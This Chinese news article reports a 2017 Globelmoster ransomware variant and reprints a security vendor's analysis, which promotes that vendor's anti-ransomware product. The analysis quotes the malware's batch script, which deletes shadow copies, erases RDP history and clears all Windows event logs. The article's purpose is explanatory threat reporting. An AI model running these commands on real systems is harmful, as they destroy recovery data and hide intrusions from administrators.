毕尔巴鄂对阵皇家社会:两支近邻球队将于西甲联赛 “巴斯克德比”中为捍卫荣耀而战贝壳第三季度营收226亿元 经调净利润17.8 亿元 同比下降17.46%AI营销,让科技巨头尝到了大模型商业化的甜头安恒信息范渊在乌镇峰会谈AI:以工具视之、以工具用之、以工具治理之诺基亚与微软再合作,为 Azure 数据中心供货延长五年天岳先进发布业界首款 300mm(12 英寸)N 型碳化硅衬底三星介绍内部安全团队 Project Infinity 攻防演练项目,高效修复 Galaxy 手机平板漏洞上海市将推进低空飞行服务管理能力建设,2027 年底前累计划设相应航线不少于 400 条岁末,海尔给您备好一套“小红花”为什么说Q10K Pro是今年最值得入手的电视?看完这几点就明白了!“小墨方·大不凡”!Brother“小墨方”系列彩喷一体机全新上市黄仁勋:AI智能需求强劲,“物理定律”限制英伟达芯片增长诺基亚与微软再合作,为Azure数据中心供货延长五年国家数据局:到2029年基本建成国家数据基础设施主体结构中国已发展成为全球最大的互联网市场,拥有全球最多的网民和移动互联网用户中国铁塔:计划按照10:1的比例合股美国FCC正式划定5.9GHz频段用于C-V2X技术在AI领域奋起直追!苹果要对Siri大革新 2026年正式发布日本机构公布量子专利榜单:本源量子、国盾量子位居全球第1中国联通:拟向华为、中兴展开5G网络设备竞争性谈判采购
  • 首页 > 产经新闻频道 > 业界新闻

    “Globelmoster”勒索病毒变种来袭 国内企业已被感染

    2017年07月21日 12:07:58   来源:21CN

      2017年7月19日,国内网友在安全论坛上反馈,自己的服务器中了勒索病毒,所有的文件均被加密,文件后缀名被修改为“skunk”。经瑞星安全专家调查分析发现是感染了Ransom.Globelmoster勒索病毒。

    “Globelmoster”勒索病毒变种来袭 国内企业已被感染

      瑞星安全人员表示,此病毒早在7月10日便已收录进瑞星病毒库,瑞星所有安全产品只要将版本升级到最新便可对其拦截。同时,作为全球首创的可以拦截已知和未知勒索病毒的“瑞星之剑”无需升级便可直接对其进行拦截。

    “Globelmoster”勒索病毒变种来袭 国内企业已被感染

    “Globelmoster”勒索病毒变种来袭 国内企业已被感染

      瑞星安全人员介绍,此次网友反馈的勒索病毒事件可能是用户的服务器存在漏洞或是弱口令,被黑客拿到了管理员权限,然后植入该病毒。因此,广大企业用户应谨慎对待,避免遭受勒索病毒攻击。可在服务器中安装瑞星之剑,既可以防御病毒攻击,同时不会对服务器造成任何影响。

      “瑞星之剑”是瑞星全球首创针对已知与未知勒索病毒的防御软件,既不影响正常工作又不影响系统性能,用户无需进行关闭系统正常服务端口、打补丁、开启防火墙等操作,便可实现全防御的效果,可供广大政府、企业和有定制化业务系统的用户直接使用。

      “Globelmoster”勒索病毒变种详细分析

      1、病毒运行后从资源中解密出加密生成文件的后缀名,和提示文件名

    “Globelmoster”勒索病毒变种来袭 国内企业已被感染

      2、将自身拷贝到%appdata%\Microsoft\SystemCertificates\My\Certificates\目录中

      3、释放批处理文件并执行

      @echo off

      vssadmin.exe Delete Shadows /All /Quiet

      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f

      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f

      reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"

      cd %userprofile%\documents\

      attrib Default.rdp -s -h

      del Default.rdp

      for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

      4、结束指定进程

    “Globelmoster”勒索病毒变种来袭 国内企业已被感染

      5、跳过指定路径不加密

    “Globelmoster”勒索病毒变种来袭 国内企业已被感染

      6、全盘加密文件

    “Globelmoster”勒索病毒变种来袭 国内企业已被感染

      7、生成提示页面

    “Globelmoster”勒索病毒变种来袭 国内企业已被感染

      8、总结

      论坛用户反馈的病毒样本就为一存粹加密器,没有感染模块。用户服务器中毒有可能是服务器上面存在漏洞或者弱口令,被黑客种植该样本勒索。

      9、防御方法

      自查服务器,看服务器上面提供的服务是否存在漏洞,服务器系统补丁保持更新,定期修改管理员账号密码,安装瑞星之剑和防病毒软件定期扫描病毒。

      文章内容仅供阅读,不构成投资建议,请谨慎对待。投资者据此操作,风险自担。

    即时

    新闻

    明火炊具市场:三季度健康属性贯穿全类目

    奥维云网(AVC)推总数据显示,2024年1-9月明火炊具线上零售额94.2亿元,同比增加3.1%,其中抖音渠道表现优异,同比有14%的涨幅,传统电商略有下滑,同比降低2.3%。

    企业IT

    重庆创新公积金应用,“区块链+政务服务”显成效

    “以前都要去窗口办,一套流程下来都要半个月了,现在方便多了!”打开“重庆公积金”微信小程序,按照提示流程提交相关材料,仅几秒钟,重庆市民曾某的账户就打进了21600元。

    3C消费

    华硕ProArt创艺27 Pro PA279CRV显示器,高能实力,创

    华硕ProArt创艺27 Pro PA279CRV显示器,凭借其优秀的性能配置和精准的色彩呈现能力,为您的创作工作带来实质性的帮助,双十一期间低至2799元,性价比很高,简直是创作者们的首选。

    研究

    中国信通院罗松:深度解读《工业互联网标识解析体系

    9月14日,2024全球工业互联网大会——工业互联网标识解析专题论坛在沈阳成功举办。